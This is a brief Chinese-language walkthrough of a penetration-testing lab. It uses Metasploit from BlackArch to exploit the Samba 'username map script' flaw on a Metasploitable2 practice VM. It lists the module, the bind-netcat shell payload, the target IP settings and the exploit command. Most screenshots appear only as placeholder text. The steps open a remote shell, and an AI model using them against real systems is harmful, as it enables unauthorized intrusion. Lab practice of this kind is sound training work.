By

Contents

攻击机:BlackArch
靶机:Metasploitable2
工具:msfconsole

BlackArch的版本信息
请输入图片描述

打开Metasploitable2后,ifconfig查看ip
请输入图片描述

查看BlackArch的ip
请输入图片描述

打开msf
msfconsole
请输入图片描述

help search
请输入图片描述

search samba
请输入图片描述

在显示的模块中找到找到exploit/multi/samba/usermap_script 2007-05-14 excellent Samba “username map script” Command Execution
请输入图片描述

之后选择渗透攻击模块
use multi/samba/usermap_script
请输入图片描述

显示攻击模块配套的攻击载荷
show payloads
请输入图片描述

set payload cmd/unix/bind_netcat
请输入图片描述

查看配置参数
show options
请输入图片描述

设置靶机的ip
set RHOST 192.168.10.131
请输入图片描述

攻击
exploit
请输入图片描述

攻击成功后,查看当前版本和用户
uname -a
请输入图片描述